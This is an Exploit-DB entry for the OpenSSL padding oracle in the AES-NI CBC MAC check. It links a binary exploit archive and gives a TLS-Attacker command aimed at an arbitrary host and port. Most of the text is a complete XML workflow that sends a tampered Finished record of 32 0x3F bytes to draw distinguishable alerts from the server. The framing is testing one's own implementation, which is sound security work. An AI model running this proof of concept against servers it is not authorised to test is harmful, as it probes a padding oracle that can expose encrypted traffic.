OpenSSL - Padding Oracle in AES-NI CBC MAC Check

EDB-ID:

39768


Platform:

Multiple

Published:

2016-05-04

Source: http://web-in-security.blogspot.ca/2016/05/curious-padding-oracle-in-openssl-cve.html

TLS-Attacker:
https://github.com/RUB-NDS/TLS-Attacker
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39768.zip


You can use TLS-Attacker to build a proof of concept and test your implementation. You just start TLS-Attacker as follows:
java -jar TLS-Attacker-1.0.jar client -workflow_input rsa-overflow.xml -connect $host:$port

The xml configuration file (rsa-overflow.xml) looks then as follows:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workflowTrace>
    <protocolMessages>
        <ClientHello>
            <messageIssuer>CLIENT</messageIssuer>
            <includeInDigest>true</includeInDigest>
            <extensions>
                <EllipticCurves>
                    <supportedCurvesConfig>SECP192R1</supportedCurvesConfig>
                    <supportedCurvesConfig>SECP256R1</supportedCurvesConfig>
                    <supportedCurvesConfig>SECP384R1</supportedCurvesConfig>
                    <supportedCurvesConfig>SECP521R1</supportedCurvesConfig>
                </EllipticCurves>
            </extensions>
            <supportedCompressionMethods>
                <CompressionMethod>NULL</CompressionMethod>
            </supportedCompressionMethods>
            <supportedCipherSuites>
                <CipherSuite>TLS_RSA_WITH_AES_128_CBC_SHA</CipherSuite>
                <CipherSuite>TLS_RSA_WITH_AES_256_CBC_SHA</CipherSuite>
                <CipherSuite>TLS_RSA_WITH_AES_128_CBC_SHA256</CipherSuite>
                <CipherSuite>TLS_RSA_WITH_AES_256_CBC_SHA256</CipherSuite>
            </supportedCipherSuites>
        </ClientHello>
        <ServerHello>
            <messageIssuer>SERVER</messageIssuer>
        </ServerHello>
        <Certificate>
            <messageIssuer>SERVER</messageIssuer>
        </Certificate>
        <ServerHelloDone>
            <messageIssuer>SERVER</messageIssuer>
        </ServerHelloDone>
        <RSAClientKeyExchange>
            <messageIssuer>CLIENT</messageIssuer>
        </RSAClientKeyExchange>
        <ChangeCipherSpec>
            <messageIssuer>CLIENT</messageIssuer>
        </ChangeCipherSpec>
        <Finished>
            <messageIssuer>CLIENT</messageIssuer>
            <records>
            <Record>
            <plainRecordBytes>
                <byteArrayExplicitValueModification>
                     <explicitValue>
  3F 3F 3F 3F 3F 3F 3F 3F  3F 3F 3F 3F 3F 3F 3F 3F
  3F 3F 3F 3F 3F 3F 3F 3F  3F 3F 3F 3F 3F 3F 3F 3F
                     </explicitValue>
                </byteArrayExplicitValueModification>
            </plainRecordBytes>
            </Record>
            </records>
        </Finished>
        <ChangeCipherSpec>
            <messageIssuer>SERVER</messageIssuer>
        </ChangeCipherSpec>
        <Finished>
            <messageIssuer>SERVER</messageIssuer>
        </Finished>
    </protocolMessages>
</workflowTrace>

It looks to be complicated, but it is just a configuration for a TLS handshake used in TLS-Attacker, with an explicit value for a plain Finished message (32 0x3F bytes). If you change the value in the Finished message, you will see a different alert message returned by the server.